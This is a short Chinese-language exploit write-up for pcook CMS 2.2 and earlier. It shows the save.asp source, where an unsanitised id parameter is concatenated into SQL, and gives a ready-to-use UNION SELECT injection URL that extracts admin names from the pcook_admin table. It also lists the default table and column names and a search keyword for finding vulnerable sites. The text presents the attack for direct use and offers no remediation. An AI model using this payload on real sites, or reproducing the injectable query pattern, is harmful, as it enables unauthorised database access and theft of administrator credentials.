save.asp代码：

<!--#include file="Inc/conn.asp"-->
<%
Dim id
Dim Rs,Sql
id = Replace(Trim(Request.QueryString("id")),"'","")
If Session("id"&id)<>"" Then
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
  Response.Write("NoData")
Else
  Response.Write("Dig")
  Response.Write(",")
  Response.Write(Rs("Dig"))
End If
Else
Set Rs = Server.CreateObject("ADODB.Recordset")
Sql = "Select * From pcook_Article Where id="&id
Rs.Open Sql,Conn,3,3
If Rs.Eof And Rs.Bof Then
  Response.Write("NoData")
Else
  Dim Dig
  Dig =Rs("Dig")
  Dig = Dig + 1
  Rs("Dig") = Dig
  Rs.Update
  Rs.Close
  Set Rs = Nothing
  Session("id"&id) = id
  Response.Write(Dig)
End If
End If
%>

过滤不全，直接可以利用

随便找篇文章，链接如list.asp?id=1341，把list.asp改为save.asp就可以了

save.asp?id=1341%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin_name,16,17,18,19,20,21%20from%20pcook_admin

有的也许是19个字段，刚刚就有遇到过

默认表名 pcook_admin

默认字段表admin_name,admin_pass

程序：pcook cms 2.2以及以下版本

关健词：pcook cms